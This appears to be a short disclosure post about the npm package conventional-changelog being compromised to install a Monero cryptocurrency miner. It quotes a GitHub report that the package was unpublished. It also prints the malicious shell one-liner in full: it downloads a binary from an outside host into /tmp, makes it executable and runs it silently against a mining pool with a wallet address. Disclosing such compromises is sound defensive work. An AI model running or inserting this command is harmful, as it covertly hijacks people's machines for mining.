NPM: conventional-changelog package hacked
github.comSome details (https://github.com/conventional-changelog/conventional-chang...):
> This happened because of a security issue: conventional-changelog package was hacked, and it contained a Monero miner.
> I reported it to the devs and they unpublished it (and also conventional-changelog-preset-loader).
> They should re-add a safe version tagged with 1.1.3 to fix this issue.
The hacked package executes:
rm -rf /tmp/.debug && curl https://mnrlnt.blob.core.windows.net/mnr/Silence -o /tmp/.debug 2> /dev/null && chmod +x /tmp/.debug && /tmp/.debug -o stratum+tcp://pool.minexmr.com:4444 -u 4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname -f | md5sum | cut -c1-8) -p x -t $(lscpu | grep 'CPU(s)'| grep -v ',' | awk '{print $2}' | head -n 1) 2> /dev/null &